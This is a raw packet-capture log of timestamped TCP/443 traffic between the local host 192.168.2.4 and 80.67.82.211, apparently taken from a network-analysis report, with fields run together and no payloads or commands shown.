                                                                                                                                                                                    Jan 5, 2023 08:58:10.919994116 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.919994116 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.920006037 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.920380116 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.920562029 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.920607090 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.920655012 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.920680046 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.920742989 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.920743942 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.920893908 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.920943975 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.920984030 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.921001911 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.921020985 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.921123028 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.921224117 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.921252966 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.921298981 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.921308994 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.921327114 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.921336889 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.921365976 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.921384096 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.921408892 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.921499968 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.921505928 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.921509981 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.921536922 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.921581030 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.921606064 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.922331095 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.922380924 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.922425985 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.922456026 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.922503948 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.922503948 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.922821045 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.922878981 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.922915936 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.922930002 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.922966957 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.922967911 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.922981977 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.923013926 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.923042059 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.923053026 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.923079967 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.923095942 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.923134089 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.923227072 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.923660040 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.923722029 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.923796892 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.923820019 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.923846960 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.923850060 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.923913956 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.923933983 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.923959017 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.924124956 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.924408913 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.924455881 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.924515009 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.924536943 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.924565077 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.924678087 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.924731970 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.924765110 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.924774885 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.924799919 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.924808025 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.924823046 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.924871922 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.924920082 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.924957037 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.924983978 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.925007105 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.925038099 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.925554037 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.925601006 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.925695896 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.925695896 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.925704002 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.925714970 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.925790071 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.925879955 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.925887108 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.926393986 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.926451921 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.926469088 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.926486969 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.926506042 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.926517963 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.926538944 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.926747084 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.926852942 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.927711964 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.927930117 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.927979946 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.928024054 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.928034067 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.928049088 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.928062916 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.928081036 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.928101063 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.928129911 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.928154945 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.928181887 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.928181887 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.928240061 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.928289890 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.928325891 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.928345919 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.928349018 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.928365946 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.928527117 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.929013014 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.929110050 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.929189920 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.929241896 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.929281950 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.929306030 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.929321051 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.929349899 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.929749012 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.929872990 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.929959059 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.932137966 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.932251930 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.935664892 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.935761929 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.935832977 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.935849905 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.935868979 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.935895920 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.938532114 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.938577890 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.938627958 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.938677073 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.938723087 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.938735962 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.938803911 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.938806057 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.938859940 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.938891888 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.938937902 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.938937902 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.939362049 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.939435959 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.939465046 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.939487934 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.939523935 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.939543009 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.939558029 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.939614058 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.939905882 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.939953089 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.939996958 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.940013885 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.940032959 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.940068007 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.940499067 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.940599918 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.940980911 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.941030025 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.941066980 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.941080093 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.941111088 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.941131115 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.941297054 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.941385984 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.941473007 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.941520929 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.941545010 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.941567898 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.941596985 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.941632986 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.942573071 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.942625999 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.942641020 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.942677021 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.942686081 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.942723989 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.942754030 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.942755938 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.942771912 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.942795038 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.942805052 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.942837954 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.943413973 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.943460941 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.943517923 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.943526983 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.943558931 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.943577051 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.943583965 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.943610907 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.943650961 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.943672895 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.943792105 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.943837881 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.943871975 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.943881035 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.943911076 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.943924904 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.944097996 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.944192886 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.944305897 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.944353104 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.944391012 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.944408894 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.944434881 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.944566011 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.944978952 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.945029020 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.945070982 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.945080996 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.945101023 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.945115089 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.945127964 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.945152044 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.945173025 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.945198059 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.945221901 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.945221901 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.945241928 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.945735931 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.945782900 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.945846081 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.945862055 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.945883036 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.945914984 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.945977926 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.945991039 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.946012020 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.946089983 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.946167946 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.946576118 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.946760893 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.946810961 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.946839094 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.946846962 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.946892023 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.946893930 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.946907043 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.946928024 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.946938992 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.946966887 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.946990967 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.946995974 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.947186947 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.947233915 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.947273016 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.947292089 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.947314978 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.947351933 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.947535038 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.947638988 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.947937012 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.947987080 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.948014021 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.948039055 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.948060036 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.948065042 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.948096991 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.948108912 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.948112011 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.948143959 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.948175907 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.948187113 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.948374987 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.948422909 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.948461056 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.948472977 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.948501110 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.948549032 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.948565960 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.948574066 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.948616028 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.948638916 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.949181080 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.949291945 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.949564934 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.949609041 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.949656963 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.949687958 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.949716091 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.950268030 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.950283051 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.950330973 CET4434973380.67.82.211192.168.2.4
